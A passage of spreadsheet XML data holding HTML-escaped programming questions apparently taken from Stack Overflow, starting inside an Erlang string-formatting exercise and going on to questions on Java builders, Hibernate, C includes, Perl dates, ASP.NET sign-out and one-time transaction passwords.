benchmark_format_overhead(_,_,0)-&amp;gt;
    true;
benchmark_format_overhead(OString,OList,Loops) -&amp;gt;
    {FString,FNames}=parse_string(OString,ONames),
    benchmark_format_overhead(OString,OList,Loops-1).
format(OString,ONames) -&amp;gt;
    {FString,FNames}=parse_string(OString,ONames),
    io:format(FString,FNames).
parse_string(FormatString,Names) -&amp;gt;
    {F,N}=parse_format(FormatString),
    {F,substitute_names(N,Names)}.
parse_format(FS) -&amp;gt;
    parse_format(FS,"",[],"").
parse_format("",FormatString,ParamList,"")-&amp;gt;
    {lists:reverse(FormatString),lists:reverse(ParamList)};
parse_format([${|FS],FormatString,ParamList,"")-&amp;gt;
    parse_name(FS,FormatString,ParamList,"");
parse_format([$}|_FS],FormatString,_,_) -&amp;gt;
    throw({'unmatched } found',lists:reverse(FormatString)});
parse_format([C|FS],FormatString,ParamList,"") -&amp;gt;
    parse_format(FS,[C|FormatString],ParamList,"").
parse_name([$}|FS],FormatString,ParamList,ParamName) -&amp;gt;
    parse_format(FS,FormatString,[list_to_atom(lists:reverse(ParamName))|ParamList],"");
parse_name([${|_FS],FormatString,_,_) -&amp;gt;
    throw({'additional { found',lists:reverse(FormatString)});
parse_name([C|FS],FormatString,ParamList,ParamName) -&amp;gt;
    parse_name(FS,FormatString,ParamList,[C|ParamName]).
substitute_names(Positioned,Values) -&amp;gt;
    lists:map(fun(CN)-&amp;gt;
                        case lists:keysearch(CN,1,Values) of
                            false -&amp;gt;
                                throw({'named parameter not found',CN,Values});
                            {_,{_,V}} -&amp;gt;
                                V
                        end end,
              Positioned).
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As this was a learning exercise, I was hoping that those more experienced with erlang could give me tips on how to improve my code.&lt;/p&gt;
&lt;p&gt;Cheers,
Mike&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using Reflection To Instantiate 'Builder Pattern' (Joshua Bloch)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When attempting to use Joshua Bloch's "Builder Pattern" [Item 2 in &lt;em&gt;Effective Java Second Edition&lt;/em&gt;] with reflection [&lt;strong&gt;object = constructors[index].newInstance(constructorParameterValues);&lt;/strong&gt;] the following exception occurs:&lt;/p&gt;
&lt;p&gt;java.lang.IllegalAccessException: Class info.soaj.core.util.SjUtilReflection can not access a member of class info.soaj.core.attribute.SjAttributesForThrowable with modifiers "private"&lt;/p&gt;
&lt;p&gt;Note: This has been resolved.  The accessible (private) constructor was being discarded and a non-accessible (override = false) was being attempted.  Bottom Line: Programmer Error &lt;/p&gt;
&lt;p&gt;An example Builder Class follows: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;package info.soaj.core.attribute;
import info.soaj.core.attribute.internal.SjAttributesForStronglyTypedWrappers;
import info.soaj.core.internal.string.SjPopulatedClassName;
import info.soaj.core.internal.string.SjPopulatedMethodName;
import info.soaj.core.util.internal.SjUtilThrowable;
import java.io.Serializable;
/**
 * &amp;lt;p&amp;gt;
 * The "Builder" pattern as documented by Joshua Bloch ("Effective Java" -
 * Second Edition) is utilized to handle the variable number of required and
 * optional parameters.
 * &amp;lt;/p&amp;gt;
 * 
 * &amp;lt;p style="font-family:Verdana; font-size:10px; font-style:italic"&amp;gt; Copyright
 * (c) 2006 - 2008 by Global Technology Consulting Group, Inc. at &amp;lt;a
 * href="http://gtcGroup.com"&amp;gt;gtcGroup.com &amp;lt;/a&amp;gt;. &amp;lt;/p&amp;gt;
 * 
 * @author MarvinToll@gtcGroup.com
 * @since v. 1.0
 */
public class SjAttributesExample implements Serializable {
    /** UID */
    private static final long serialVersionUID = 1L;
    /** The name of class throwing the exception. */
    protected final SjPopulatedClassName classname;
    /** The name of method throwing the exception. */
    protected final SjPopulatedMethodName methodname;
    /**
     * Suppresses logging; default is &amp;lt;code&amp;gt;false&amp;lt;/code&amp;gt;.
     */
    protected final boolean suppressLoggingOnly;
    /**
     * Constructor - private
     * 
     * @param builderThrowable
     */
    private SjAttributesExample(final BuilderThrowable builderThrowable) {
    	this.classname = builderThrowable.classname;
    	this.methodname = builderThrowable.methodname;
    	this.suppressLoggingOnly = builderThrowable.suppressLoggingOnly;
    }
    /**
     * This static member immutable class is used to implement the builder
     * pattern.
     * 
     * @author MarvinToll@gtcGroup.com
     * @since v. 1.0
     */
    public static class BuilderThrowable {
    	/** Class name. */
    	private static final String CLASS_NAME = BuilderThrowable.class
    			.getName();
    	// Required attributes.
    	/** The name of class throwing the exception. */
    	protected final SjPopulatedClassName classname;
    	/** The name of method throwing the exception. */
    	protected final SjPopulatedMethodName methodname;
    	// Optional attributes.
    	/** Prevents action from occurring. Default is false. */
    	protected boolean suppressLoggingOnly = false;
    	/**
    	 * Constructor
    	 * 
    	 * @param classname
    	 * @param methodname
    	 */
    	public BuilderThrowable(final String classname, final String methodname) {
    		super();
    		final String Method_Name = "BuilderThrowable";
    		// What happens when handling an exception throws an exception?
    		try {
    			this.classname = new SjPopulatedClassName(classname,
    					new SjAttributesForStronglyTypedWrappers(CLASS_NAME,
    							Method_Name));
    			this.methodname = new SjPopulatedMethodName(methodname,
    					new SjAttributesForStronglyTypedWrappers(CLASS_NAME,
    							Method_Name));
    		} catch (final RuntimeException e) {
    			// Log the contextual details.
    			SjUtilThrowable.logExceptionOccuredWhileThrowingException(
    					CLASS_NAME, Method_Name, e);
    			throw e;
    		}
    		return;
    	}
    	/**
    	 * This method sets a flag to suppress logging.
    	 * 
    	 * @param isLoggingSuppressed
    	 * @return BuilderThrowable
    	 */
    	public BuilderThrowable suppressLoggingOnly(
    			final boolean isLoggingSuppressed) {
    		this.suppressLoggingOnly = isLoggingSuppressed;
    		return this;
    	}
    	/**
    	 * This method is used for instantiating this class.
    	 * 
    	 * @return SjAttributesForThrowable
    	 */
    	@SuppressWarnings("synthetic-access")
    	public SjAttributesExample build() {
    		return new SjAttributesExample(this);
    	}
    }
    /**
     * This method returns an attribute.
     * 
     * @return String - Returns the &amp;lt;code&amp;gt;classname&amp;lt;/code&amp;gt; attribute.
     */
    public String getClassname() {
    	return this.classname.getString();
    }
    /**
     * This method returns an attribute.
     * 
     * @return String - Returns the &amp;lt;code&amp;gt;methodname&amp;lt;/code&amp;gt; attribute.
     */
    public String getMethodname() {
    	return this.methodname.getString();
    }
    /**
     * This method returns an attribute.
     * 
     * @return boolean - Returns the &amp;lt;code&amp;gt;suppressLoggingOnly&amp;lt;/code&amp;gt; attribute.
     */
    public boolean isLoggingSuppressed() {
    	return this.suppressLoggingOnly;
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Linking page title block to home - best practises?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I do most if not all my sites to have the page title block (generally a styled h1 on my pages) to link back to the home page. &lt;/p&gt;
&lt;p&gt;Should this be linked on the first page, i.e. the home page? I read that this shouldn't be linked, but one thing I do when I go to a page for the first time is mouseover the title to check the status bar to see if it will send me home. &lt;/p&gt;
&lt;p&gt;What I'm asking is best practises for this... should the home page's title link back to itself for future reference for the user?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Ruby Basics</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best online resource for learning the ruby language? Preferably intermediate and advanced topics.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Table per Concrete Class Hierarchy in Hibernate</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following Hibernate Mapping, which has to be mapped using the Table per Concrete Class Hierarchy:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;hibernate-mapping package='dao'&amp;gt;
    &amp;lt;meta attribute='class-description'&amp;gt;&amp;lt;/meta&amp;gt;
    &amp;lt;class name='PropertyDAO'&amp;gt;
    	&amp;lt;id name='id' column='id_property'&amp;gt;
    		&amp;lt;generator class='assigned'/&amp;gt;
    	&amp;lt;/id&amp;gt;
    	&amp;lt;property name='address' column='address' type='string'/&amp;gt;
    	&amp;lt;union-subclass name='HouseDAO' table='house'&amp;gt;
    		&amp;lt;property name='noOfRooms' column='noOfRooms'/&amp;gt;
    		&amp;lt;property name='totalArea' column='totalArea'/&amp;gt;
    		&amp;lt;property name='price' column='price'/&amp;gt;
    	&amp;lt;/union-subclass&amp;gt;
    	&amp;lt;union-subclass name='LandDAO' table='land'&amp;gt;
    		&amp;lt;property name='area' column='area'/&amp;gt;
    		&amp;lt;property name='unitPrice' column='unitPrice'/&amp;gt;
    	&amp;lt;/union-subclass&amp;gt;
    &amp;lt;/class&amp;gt;
&amp;lt;/hibernate-mapping&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which means in the database i have only 2 tables : &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;house (id_property(PK), address, noOfRooms, totalArea, price)&lt;/li&gt;
&lt;li&gt;land (id_property(PK), address, area, unitPrice)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;As far as I understood, in this case the ids need to be generated explicitly before calling .save(), so my question is: How can I create a strategy for the automatically generation of the ids, so that the ids from the concrete class form a continuous domain when joined.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I change the thickness of the border of a window with MFC?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Normally, the thickness of a window is 4 pixels, which can be retrieved by GetSystemMetrics method. Can I change its value, for example 2 pixels?&lt;/p&gt;
&lt;p&gt;Thank you very much!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I make a button like 'Digg it' for my website?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got a blogging site hosted on Windows Sever, ASP.Net 3.5, ASP.Net AJAX, SQL Server in background.&lt;/p&gt;
&lt;p&gt;I want to give bloggers a button like 'digg-it' which they can put on their blogs for the readers to click to thumb-up the post if they like it.&lt;/p&gt;
&lt;p&gt;I know I'll be using Javascript to do that. What can I do to: -&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Retrieve code from my website which will display the current count of the thumb-up.&lt;/li&gt;
&lt;li&gt;Increase the count on my website if the user thumbs up something.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Since most of these blogs are on blogger.com/wordpress.com, the plugin code will be embedded in the blog theme. I guess I will be using the URL of the blog post as the unique id. My problem is how to get my site and javascript that's on blogger.com talking.&lt;/p&gt;
&lt;p&gt;Your help will be appreciated.&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to trace a NullPointerException in a chain of getters</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I get a NullPointerException in a call like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;someObject.getSomething().getSomethingElse().
    getAnotherThing().getYetAnotherObject().getValue();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I get a rather useless exception text like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Exception in thread "main" java.lang.NullPointerException
at package.SomeClass.someMethod(SomeClass.java:12)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I find it rather hard to find out wich call actually returend null, often finding myself refactoring the code to something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Foo ret1 = someObject.getSomething();
Bar ret2 = ret1.getSomethingElse();
Baz ret3 = ret2.getAnotherThing();
Bam ret4 = ret3.getYetAnotherOject();
int ret5 = ret4.getValue();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and then waiting for a more descriptive NullPointerException that tells me which line to look for.&lt;/p&gt;
&lt;p&gt;Some of you might argue that concatening getters is bad style and should be avoided anyway, but my Question is: Can I find the bug without changing the code? &lt;/p&gt;
&lt;p&gt;Hint: I'm using eclipse and I know what a debugger is, but I can't figuere out how to apply it to the problem.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;My conclusion on the answers:&lt;/strong&gt;&lt;br /&gt;
Some answers told me that I should not chain getters one after another, some answers showed my how to debug my code if I disobayed that advice.&lt;/p&gt;
&lt;p&gt;I've accepted an answer that taught me excactly when to chain getters:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;If they cannot return null, chain them as long as you like. No need for checking != null, no need to worry about NullPointerExceptions (&lt;em&gt;be warned that chaining still vialotes the law of demeter, but I can live with that&lt;/em&gt;)&lt;/li&gt;
&lt;li&gt;If they may return null, don't ever, never ever chain them, and perform a check for null values on each one that may return null&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This makes any good advice on actual debugging useless.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>"#include" a text file in a C program as a char[]</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to include an entire text file as a string in a C program at compile-time?&lt;/p&gt;
&lt;p&gt;something like:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;file.txt:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;This is
a little
text file
&lt;/code&gt;&lt;/pre&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;main.c:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;stdio.h&amp;gt;
int main(void) {
   #blackmagicinclude("file.txt", content)
   /*
   equiv: char[] content = "This is\na little\ntext file";
   */
   printf("%s", content);
}
&lt;/code&gt;&lt;/pre&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;obtaining a little program that prints on stdout "This is
a little
text file"&lt;/p&gt;
&lt;p&gt;At the moment I used an hackish python script, but it's butt-ugly and limited to only one variable name, can you tell me another way to do it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is involved in open sourcing proprietary software?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My primary motivation for asking this question is &lt;a href="http://stackoverflow.uservoice.com/pages/general/suggestions/29462-make-your-software-open-source" rel="nofollow"&gt;this uservoice suggestion&lt;/a&gt;.  Jeff declined the ticket to make the SO software open source saying that it will take more time.&lt;/p&gt;
&lt;p&gt;I've seen this before in various other pieces of software that have gone from proprietary to open source.  So, my question is:  &lt;strong&gt;why does it seem to take so long to make software open source?&lt;/strong&gt;  To me, it seems pretty simple:  put your code on sourceforge and google code and be done with it.  But there's obviously something that I'm missing in the whole process.&lt;/p&gt;
&lt;p&gt;(And before anyone gets the impression that I'm trying to be critical of Jeff or anyone else that delays open sourcing their software, I'm not.  I just want to get an understanding of the process for open sourcing stuff and its costs.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I select individual words of a camelized word in IntelliJ IDEA</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the shortcut in IntelliJ IDEA to move across or select individual words of a camelized word? Lets say I have aLongMultiWordVariableName, I want to be able to move the cursor to each word for editing or select parts of the variable.&lt;/p&gt;
&lt;p&gt;Eclipse has a shortcut to do this &lt;kbd&gt;Ctrl&lt;/kbd&gt;+&lt;kbd&gt;&amp;larr;&lt;/kbd&gt;/&lt;kbd&gt;&amp;rarr;&lt;/kbd&gt; for move and &lt;kbd&gt;Ctrl&lt;/kbd&gt;+&lt;kbd&gt;Shift&lt;/kbd&gt;+&lt;kbd&gt;&amp;larr;&lt;/kbd&gt;/&lt;kbd&gt;&amp;rarr;&lt;/kbd&gt; for selection.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Do you usually set the default value before or set it in the else?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Which one of the following do you do:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var = true;
if (...) var = false;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Or&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (...) var = false;
else var = true;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there a reason you pick on or the other?&lt;/p&gt;
&lt;p&gt;I'm working on the premise that nothing else is happening to var. The next line of code might be something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (var) { ... }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Subversion Repository on Linux Dev</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's the best practice for setting up a subversion repository on a linux development machine.  External users need to be able to access a specific repository, but nothing else on the machine.  I know one answer is to set up a dedicated repository, but I'm looking for a single machine solution: location of repositories, accounts, backup procedures.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Use HTTP Keep-Alive for server to communicate to client</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Recently in an interview I was asked how I would approach an online chat client application.  I went through the standard "polling" solution but was cut off because the interviewer was looking for the "HTTP 1.1 keep-alive" method.  Having used HTTP for quite a while and remembering that the whole point was to be "stateless", this never occurred to me (also, not to mention that the keep-alive is not consistently implemented).&lt;/p&gt;
&lt;p&gt;My question is, is it possible for a web server to broadcast and/or send information to a client when the "keep-alive" header has been set?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Understanding IEquatable</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If i want to compare objects and they implement the IEquatable&amp;lt;&gt; interface, i have a few questions:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Why do i have to override Equals(object ) if i have to implements Equals&amp;lt;&gt;&lt;/li&gt;
&lt;li&gt;can i use == and != once i implement IEquatable ?&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>How to create a series of dates in Cocoa for a week</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am current writing an application and need to show the current days of the week.&lt;/p&gt;
&lt;p&gt;So, for the coming week I need to generate the follow dates.&lt;/p&gt;
&lt;p&gt;Monday, 5 January 2009
Tuesday, 6 January 2009
Wednesday, 7 January 2009
Thursday, 8 January 2009
Friday, 9 January 2009&lt;/p&gt;
&lt;p&gt;I have already coded the application to generate five dates from the current date. The problem I have is finding a method to create Monday through to Friday on the current week.&lt;/p&gt;
&lt;p&gt;I am running OS X 10.5 and am using the Cocoa environment.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why does FogBugz require that the DEP is turned off?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am really wondering why FogBugz when installed locally insists that &lt;a href="http://support.microsoft.com/default.aspx/kb/875352" rel="nofollow"&gt;DEP&lt;/a&gt; is turned off? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Enterprise Library Unity vs Other IoC Containers</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's pros and cons of using Enterprise Library Unity vs other IoC containers (Windsor, Spring.Net, Autofac ..)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I parse dates and convert time zones in Perl?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've used the &lt;a href="http://perldoc.perl.org/functions/localtime.html"&gt;localtime&lt;/a&gt; function in Perl to get the current date and time but need to parse in existing dates. I have a GMT date in the following format: "20090103 12:00" I'd like to parse it into a date object I can work with and then convert the GMT time/date into my current time zone which is currently Eastern Standard Time. So I'd like to convert "20090103 12:00" to "20090103 7:00" any info on how to do this would be greatly appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I retrieve a Django model class dynamically?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Without having the full module path of a Django model, is it possible to do something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;model = 'User' [in Django namespace]
model.objects.all()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;...as opposed to:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;User.objects.all().
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;EDIT: I am trying to make this call based on command-line input. Is it possible to avoid the import statement, e.g., &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;model = django.authx.models.User
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Without Django returning the error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;"global name django is not defined."
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Possible to call Oracle FUNCTION from .Net using Enterprise Library?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following Oracle function:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function get_job_no return number is
        V_job_no number;
      begin
         select appwork.tlm_corphier_job.nextval into V_job_no from dual;
         return V_job_no;
      end get_job_no;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;PLEASE NOTE:&lt;br /&gt;
1) This is a FUNCTION, not a procedure&lt;br /&gt;
2) This is returning a NUMBER, not a VARCHAR&lt;br /&gt;
3) I happen to be using System.Data.OracleClient rather than Oracle.DataAccess.Client (due to another issue I was having) but a solution with either would be fine.  &lt;/p&gt;
&lt;p&gt;I am trying to call this from VB.Net using the MS enterprise library like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Imports Microsoft.Practices.EnterpriseLibrary.Data
Imports System.Data.OracleClient
    Public Function GetNextJobNumber() As Object
        Dim db As Database = DatabaseFactory.CreateDatabase()
        Dim myresult As Object = Nothing
        Using cmd As DbCommand = db.GetStoredProcCommand("CORPHIER_PKG.get_job_no")
            Dim retval As New Data.OracleClient.OracleParameter("retval", GetType(System.Data.OracleClient.OracleNumber))
            retval.Direction = ParameterDirection.ReturnValue
            cmd.Parameters.Add(retval)
            db.ExecuteNonQuery(cmd)
            myresult = retval.Value
        End Using
        Return myresult
    End Function
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I get the following error:&lt;/p&gt;
&lt;p&gt;System.InvalidCastException: Failed to convert parameter value from a RuntimeType to a Decimal. ---&gt; System.InvalidCastException: Object must implement IConvertible.
   at System.Convert.ChangeType(Object value, Type conversionType, IFormatProvider provider)
   at System.Data.OracleClient.OracleParameter.CoerceValue(Object value, MetaType destinationType)
   --- End of inner exception stack trace ---
   at System.Data.OracleClient.OracleParameter.CoerceValue(Object value, MetaType destinationType)
   at System.Data.OracleClient.OracleParameter.SetCoercedValueInternal(Object value, MetaType metaType)
   at System.Data.OracleClient.OracleParameterBinding.PrepareForBind(OracleConnection connection, Int32&amp;amp; offset)
   at System.Data.OracleClient.OracleCommand.Execute(OciStatementHandle statementHandle, CommandBehavior behavior, Boolean needRowid, OciRowidDescriptor&amp;amp; rowidDescriptor, ArrayList&amp;amp; resultParameterOrdinals)
   at System.Data.OracleClient.OracleCommand.ExecuteNonQueryInternal(Boolean needRowid, OciRowidDescriptor&amp;amp; rowidDescriptor)
   at System.Data.OracleClient.OracleCommand.ExecuteNonQuery()
   at Microsoft.Practices.EnterpriseLibrary.Data.Database.DoExecuteNonQuery(DbCommand command)
   at Microsoft.Practices.EnterpriseLibrary.Data.Database.ExecuteNonQuery(DbCommand command)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>RewriteRule but keep the subdomain</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to redirect the following as an example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;A.olddomain.com.au/blah.html  &amp;gt;  A.newdomain.com/blah.html
B.olddomain.com.au/blah.html  &amp;gt;  B.newdomain.com/blah.html
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Essentially, I have a variable number of subdomains and I only want to change the domain name itself on the redirect.&lt;/p&gt;
&lt;p&gt;Any clues or suggestions to try out?&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I skip items when tabbing without using tabindex?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a good way, in a javascript onfocus() handler, to trampoline the focus to the next item in the tab order, without having to manually enter the ID of the item that should be next?&lt;/p&gt;
&lt;p&gt;I built an HTML date picker in Django/jQuery.  It's a line edit followed by a calendar icon that pops up a calendar.  I want to be able to tab from the line edit to the next input, skipping the link for the calendar icon.  I mean for it to be a generalized widget, so I can't hardcode the id of whatever is next and call .focus().  I know I could set tabindex attributes on everything, but that's more manual than I'd like.  Also, iirc, that wouldn't prevent it from taking the focus, it would just put it at the end of the tab order.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>TDD - How much do you test?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on a new project and I'm using the repository pattern, I have my repository that pulls the data from the database and a "service" class which uses the repository and does all the business logic.&lt;/p&gt;
&lt;p&gt;something similar to the following;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class UserRepository : IUserRepository
{
    public IQueryable&amp;lt;User&amp;gt; GetUsers()
    {
    // do stuff
    }
}
public class UserService 
{
    public IList&amp;lt;User&amp;gt; GetUserById
    {
        var rep = new UserRepository();
        var users = rep.GetUsers();
        // do business logic
        return users.ToList();
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Would you test both the UserService and the UserRepository or do you think testing just the Service would suffice?  I figure since the service is using the repository it should be fun, but it does kill code coverage.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>FormsAuthentication.SignOut() does not log the user out</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Smashed my head against this a bit too long. How do I prevent a user from browsing a site's pages after they have been logged out using FormsAuthentication.SignOut? I would expect this to do it:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;FormsAuthentication.SignOut();
Session.Abandon();
FormsAuthentication.RedirectToLoginPage();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But it doesn't. If I type in a URL directly, I can still browse to the page. I haven't used roll-your-own security in a while so I forget why this doesn't work.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Combine paths in Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a Java equivalent for &lt;a href="http://msdn.microsoft.com/en-us/library/system.io.path.combine.aspx"&gt;&lt;code&gt;System.IO.Path.Combine()&lt;/code&gt;&lt;/a&gt; in C#/.NET? Or any code to accomplish this?&lt;/p&gt;
&lt;p&gt;This static method combines one or more strings into a path.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Problem compiling gnustep-gui-0.16.0 undefined reference to png_sizeof</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to compile GNUstep on a linux box but gnustep-gui-0.16.0 package is failing. I downloaded GNUstep Startup stable 0.20.1 (&lt;a href="http://wwwmain.gnustep.org/resources/downloads.php" rel="nofollow"&gt;http://wwwmain.gnustep.org/resources/downloads.php&lt;/a&gt;)and follow instructions about how to compile (./configure &amp;amp;&amp;amp; make). I'm getting this error:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;libgnustep-gui.so: undefined reference to 'png_sizeof'&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;I have compiled latest libpng (1.2.34) and I can see that png_sizeof is defined as macro. However, I'm not quite sure how to fix the gnustep-gui-0.16.0 build. I tried to pass the include/lib directory where libpng is installed to configure build but nothing seems to help.&lt;/p&gt;
&lt;p&gt;I have quite up to date linux box but using gcc 3.3 (upgrade is not an option - but this should not be a problem).&lt;/p&gt;
&lt;p&gt;Full error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Making all for tool set_show_service...
 Compiling file set_show_service.m ...
 Linking tool set_show_service ...
../Source/./obj/libgnustep-gui.so: undefined reference to `png_sizeof'
collect2: ld returned 1 exit status
gmake[3]: *** [obj/set_show_service] Error 1
gmake[2]: *** [set_show_service.all.tool.variables] Error 2
gmake[1]: *** [internal-all] Error 2
gmake[1]: Leaving directory `/home/bla/local/src/gnustep-startup-0.22.0/build/gnustep-gui-0.16.0'
gmake[3]: *** [obj/set_show_service] Error 1
gmake[2]: *** [set_show_service.all.tool.variables] Error 2
gmake[1]: *** [internal-all] Error 2
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any suggestions?
Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best practices/algorithm/approach for implementing temporary transaction password for banking/financial website</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What are the best practices for implementing temporary transaction password feature for website?&lt;/p&gt;
&lt;p&gt;For e.g in banking/finance scenarios like
- While transfering funds from one account to another, a transaction password is required
- While commiting a trade, a transaction password is required
- etc.&lt;/p&gt;
&lt;p&gt;The password should be temporary and time based i.e. this password should not work after x minutes has elapsed.&lt;/p&gt;
&lt;p&gt;What algorithm would you recommend?
Do you suggest keeping track of used passwords i.e. store used password in some store?&lt;/p&gt;
&lt;p&gt;Some website use a OneTimePassword device.  Apart from this please feel to highlight any other strategy you think may be appropriate.&lt;/p&gt;
&lt;p&gt;Any other thoughts/suggestions/algorithm welcome.&lt;/p&gt;
&lt;p&gt;Edit: Based on question from 'lassevk'&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;The password would be communicated by email/phone/sms.&lt;/li&gt;
&lt;li&gt;There is no third site involved.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I require this for additional level of security for critical points in the application.
This may also be called as "AuthenticationCode".  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to to send and retrieve data from flickr flickr.test.echo method using JQuery Ajax REST?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to display whatever the response of flickr.test.echo was on the page using rest (jquery ajax - because thats what im using)&lt;/p&gt;
&lt;p&gt;I need to supply an api_key&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;The REST Endpoint URL is &lt;a href="http://api.flickr.com/services/rest/" rel="nofollow"&gt;http://api.flickr.com/services/rest/&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;To request the flickr.test.echo service, invoke like this:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://api.flickr.com/services/rest/?method=flickr.test.echo&amp;amp;name=value" rel="nofollow"&gt;http://api.flickr.com/services/rest/?method=flickr.test.echo&amp;amp;name=value&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;By default, REST requests will send a REST response.&lt;/p&gt;
